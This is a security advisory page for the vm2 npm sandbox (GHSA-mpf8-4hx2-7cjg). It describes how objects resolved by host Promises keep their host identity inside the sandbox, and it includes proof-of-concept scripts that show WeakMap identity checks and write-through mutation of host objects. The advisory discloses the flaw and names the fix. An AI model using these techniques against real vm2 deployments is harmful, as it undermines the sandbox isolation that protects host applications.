GHSA-MPF8-4HX2-7CJG

Vulnerability from github – Published: 2026-05-07 04:29 – Updated: 2026-05-14 20:36
VLAI
Summary
vm2 Host Promise Resolution Preserves Object Identity Across Sandbox Boundary
Details

Summary

A sandbox boundary violation in vm2 allows host object identity to cross into the sandbox through host Promise resolution.

When a host-side Promise that resolves to a host object is exposed to the sandbox, the value delivered to the sandbox .then() callback preserves host identity. This allows the sandbox to interact with the host object directly, including:

  • Performing identity checks using host-side WeakMap
  • Mutating host object state from inside the sandbox

This behavior occurs because the Promise fulfillment wrapper uses ensureThis() instead of the stronger cross-realm conversion path (from() / proxy wrapping). If no prototype mapping is found, ensureThis() returns the original object.

As a result, objects resolved by host Promises can cross the sandbox boundary without proper isolation.

Details

In setup-sandbox.js, vm2 wraps Promise.prototype.then:

```js globalPromise.prototype.then = function then(onFulfilled, onRejected) { resetPromiseSpecies(this);

if (typeof onFulfilled === 'function') { const origOnFulfilled = onFulfilled; onFulfilled = function onFulfilled(value) { value = ensureThis(value); return apply(origOnFulfilled, this, [value]); }; }

return apply(globalPromiseThen, this, [onFulfilled, onRejected]); };

The wrapper calls ensureThis(value) before invoking the sandbox callback.

However, ensureThis is implemented in bridge.js as thisEnsureThis():

function thisEnsureThis(other) { const type = typeof other;

switch (type) { case 'object': if (other === null) return null;

case 'function':
  let proto = thisReflectGetPrototypeOf(other);

  if (!proto) {
    return other;
  }

  while (proto) {
    const mapping = thisReflectApply(thisMapGet, protoMappings, [proto]);

    if (mapping) {
      const mapped = thisReflectApply(thisWeakMapGet, mappingOtherToThis, [other]);
      if (mapped) return mapped;
      return mapping(defaultFactory, other);
    }

    proto = thisReflectGetPrototypeOf(proto);
  }

  return other;

If no prototype mapping is found, ensureThis() simply returns the original object:

return other;

This means the sandbox receives the original host object instead of a proxied or sanitized representation.

Because of this behavior, values resolved by host Promises can cross the host–sandbox boundary with identity preserved.

PoC

The following Proof of Concept demonstrates that an object resolved by a host Promise can be used as a valid key in a host-side WeakMap from inside the sandbox.

WeakMap keys rely on reference identity, so a successful lookup proves that the sandbox received the host object identity.

PoC Code import {VM} from "./index.js";

const hostObj = {tag: "HOST_OBJ"}; const hostPromise = Promise.resolve(hostObj);

// WeakMap created on the host const wm = new WeakMap([[hostObj, "HIT"]]);

const vm = new VM({ sandbox: {hostPromise, wm}, timeout: 1000, eval: false, wasm: false, });

const code = hostPromise.then(v => ({ weakMapGet: wm.get(v), typeofV: typeof v, tag: v.tag }));

const result = await vm.run(code);

console.log("VM RESULT:", result); console.log("HOST SAME KEY STILL:", wm.get(hostObj)); Output VM RESULT: { weakMapGet: 'HIT', typeofV: 'object', tag: 'HOST_OBJ' } HOST SAME KEY STILL: HIT

This confirms that the object delivered to the sandbox callback retains host identity.

Additional Demonstration: Host Object Mutation

The sandbox can also mutate host object state through the resolved Promise value.

import {VM} from "./index.js";

const hostObj = {tag: "HOST_OBJ", nested: {x: 1}}; const hostPromise = Promise.resolve(hostObj);

const vm = new VM({ sandbox: {hostPromise}, timeout: 1000, eval: false, wasm: false, });

const code = hostPromise.then(v => { v.nested.x = 999; v.tag = "MUTATED"; return { seenTag: v.tag, seenX: v.nested.x }; });

const result = await vm.run(code);

console.log("VM RESULT:", result); console.log("HOST AFTER:", hostObj);

Output: VM RESULT: { seenTag: 'MUTATED', seenX: 999 } HOST AFTER: { tag: 'MUTATED', nested: { x: 999 } }

This demonstrates write-through mutation of a host object from sandbox code.

Impact This vulnerability allows host object references to cross the vm2 sandbox boundary via Promise resolution.

Consequences include:

Host object identity disclosure

Write-through mutation of host objects

WeakMap / WeakSet identity oracle across the boundary

Potential capability leaks if sensitive host objects are reachable via Promises

Applications that expose host Promises to sandboxed code may unintentionally grant the sandbox direct access to host objects.

This weakens the intended isolation guarantees of vm2.

Severity
6.5 (Medium)
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N
Show details on source website
To clipboard 

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 3.10.5"
      },
      "package": {
        "ecosystem": "npm",
        "name": "vm2"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "3.11.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-44000"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-668",
      "CWE-693"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-05-07T04:29:22Z",
    "nvd_published_at": "2026-05-13T18:16:16Z",
    "severity": "MODERATE"
  },
  "details": "### Summary\n\nA sandbox boundary violation in **vm2** allows host object identity to cross into the sandbox through host Promise resolution.\n\nWhen a host-side Promise that resolves to a host object is exposed to the sandbox, the value delivered to the sandbox `.then()` callback preserves host identity. This allows the sandbox to interact with the host object directly, including:\n\n- Performing identity checks using host-side `WeakMap`\n- Mutating host object state from inside the sandbox\n\nThis behavior occurs because the Promise fulfillment wrapper uses `ensureThis()` instead of the stronger cross-realm conversion path (`from()` / proxy wrapping). If no prototype mapping is found, `ensureThis()` returns the original object.\n\nAs a result, objects resolved by host Promises can cross the sandbox boundary without proper isolation.\n\n---\n\n### Details\n\nIn `setup-sandbox.js`, vm2 wraps `Promise.prototype.then`:\n\n```js\nglobalPromise.prototype.then = function then(onFulfilled, onRejected) {\n  resetPromiseSpecies(this);\n\n  if (typeof onFulfilled === \u0027function\u0027) {\n    const origOnFulfilled = onFulfilled;\n    onFulfilled = function onFulfilled(value) {\n      value = ensureThis(value);\n      return apply(origOnFulfilled, this, [value]);\n    };\n  }\n\n  return apply(globalPromiseThen, this, [onFulfilled, onRejected]);\n};\n\n\nThe wrapper calls ensureThis(value) before invoking the sandbox callback.\n\nHowever, ensureThis is implemented in bridge.js as thisEnsureThis():\n\nfunction thisEnsureThis(other) {\n  const type = typeof other;\n\n  switch (type) {\n    case \u0027object\u0027:\n      if (other === null) return null;\n\n    case \u0027function\u0027:\n      let proto = thisReflectGetPrototypeOf(other);\n\n      if (!proto) {\n        return other;\n      }\n\n      while (proto) {\n        const mapping = thisReflectApply(thisMapGet, protoMappings, [proto]);\n\n        if (mapping) {\n          const mapped = thisReflectApply(thisWeakMapGet, mappingOtherToThis, [other]);\n          if (mapped) return mapped;\n          return mapping(defaultFactory, other);\n        }\n\n        proto = thisReflectGetPrototypeOf(proto);\n      }\n\n      return other;\n\nIf no prototype mapping is found, ensureThis() simply returns the original object:\n\nreturn other;\n\nThis means the sandbox receives the original host object instead of a proxied or sanitized representation.\n\nBecause of this behavior, values resolved by host Promises can cross the host\u2013sandbox boundary with identity preserved.\n\nPoC\n\nThe following Proof of Concept demonstrates that an object resolved by a host Promise can be used as a valid key in a host-side WeakMap from inside the sandbox.\n\nWeakMap keys rely on reference identity, so a successful lookup proves that the sandbox received the host object identity.\n\nPoC Code\nimport {VM} from \"./index.js\";\n\nconst hostObj = {tag: \"HOST_OBJ\"};\nconst hostPromise = Promise.resolve(hostObj);\n\n// WeakMap created on the host\nconst wm = new WeakMap([[hostObj, \"HIT\"]]);\n\nconst vm = new VM({\n  sandbox: {hostPromise, wm},\n  timeout: 1000,\n  eval: false,\n  wasm: false,\n});\n\nconst code = `\n  hostPromise.then(v =\u003e ({\n    weakMapGet: wm.get(v),\n    typeofV: typeof v,\n    tag: v.tag\n  }))\n`;\n\nconst result = await vm.run(code);\n\nconsole.log(\"VM RESULT:\", result);\nconsole.log(\"HOST SAME KEY STILL:\", wm.get(hostObj));\nOutput\nVM RESULT: { weakMapGet: \u0027HIT\u0027, typeofV: \u0027object\u0027, tag: \u0027HOST_OBJ\u0027 }\nHOST SAME KEY STILL: HIT\n\nThis confirms that the object delivered to the sandbox callback retains host identity.\n\nAdditional Demonstration: Host Object Mutation\n\nThe sandbox can also mutate host object state through the resolved Promise value.\n\nimport {VM} from \"./index.js\";\n\nconst hostObj = {tag: \"HOST_OBJ\", nested: {x: 1}};\nconst hostPromise = Promise.resolve(hostObj);\n\nconst vm = new VM({\n  sandbox: {hostPromise},\n  timeout: 1000,\n  eval: false,\n  wasm: false,\n});\n\nconst code = `\n  hostPromise.then(v =\u003e {\n    v.nested.x = 999;\n    v.tag = \"MUTATED\";\n    return { seenTag: v.tag, seenX: v.nested.x };\n  })\n`;\n\nconst result = await vm.run(code);\n\nconsole.log(\"VM RESULT:\", result);\nconsole.log(\"HOST AFTER:\", hostObj);\n\n**Output:**\nVM RESULT: { seenTag: \u0027MUTATED\u0027, seenX: 999 }\nHOST AFTER: { tag: \u0027MUTATED\u0027, nested: { x: 999 } }\n\nThis demonstrates write-through mutation of a host object from sandbox code.\n\n**Impact**\nThis vulnerability allows host object references to cross the vm2 sandbox boundary via Promise resolution.\n\nConsequences include:\n\nHost object identity disclosure\n\nWrite-through mutation of host objects\n\nWeakMap / WeakSet identity oracle across the boundary\n\nPotential capability leaks if sensitive host objects are reachable via Promises\n\nApplications that expose host Promises to sandboxed code may unintentionally grant the sandbox direct access to host objects.\n\nThis weakens the intended isolation guarantees of vm2.",
  "id": "GHSA-mpf8-4hx2-7cjg",
  "modified": "2026-05-14T20:36:48Z",
  "published": "2026-05-07T04:29:22Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/patriksimek/vm2/security/advisories/GHSA-mpf8-4hx2-7cjg"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-44000"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/patriksimek/vm2"
    },
    {
      "type": "WEB",
      "url": "https://github.com/patriksimek/vm2/releases/tag/v3.11.0"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "vm2 Host Promise Resolution Preserves Object Identity Across Sandbox Boundary"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.




Forecast uses a logistic model when the trend is rising, or an exponential decay model when the trend is falling. Fitted via linearized least squares.

Sightings

Author Source Type Date Other

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.



Detection rules are retrieved from Rulezet.